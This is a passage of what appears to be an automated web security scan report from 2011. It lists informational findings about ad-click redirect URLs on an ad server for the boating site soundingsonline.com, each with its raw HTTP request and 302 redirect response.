<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.450. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/674816273/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/674816273/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/674816273/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/674816273/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:02:13 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.451. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/676472739/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/676472739/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/676472739/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/676472739/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:40:12 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 303
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.452. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/68136723/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/68136723/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/68136723/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/68136723/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:53:35 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.453. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/681435823/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/681435823/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/681435823/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/681435823/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:37:19 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&PUBID=586&SOURCE=INET&RDRID=&SBTYPE=QN&PGTP=S
Content-Length: 401
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S">here</a>
...[SNIP]...

20.454. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/706664927/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/706664927/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/706664927/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/706664927/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:03:52 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.455. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/707347491/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/707347491/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/707347491/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/707347491/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:52:33 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.456. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/717893952/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/717893952/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/717893952/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/717893952/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:53:01 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.457. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/727119196/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/727119196/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/727119196/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/727119196/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:51:44 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.458. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/729172523/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/729172523/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/729172523/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/729172523/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:00:44 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.459. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/730225288/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/730225288/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/730225288/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/730225288/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:50:37 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.460. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/732627183/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/732627183/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/732627183/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/732627183/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:57:57 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.461. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/738205021/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/738205021/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/738205021/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/738205021/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:52:17 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.462. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/739958962/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/739958962/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/739958962/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/739958962/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:59:26 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.463. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/745152942/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/745152942/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/745152942/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/745152942/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:55:48 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

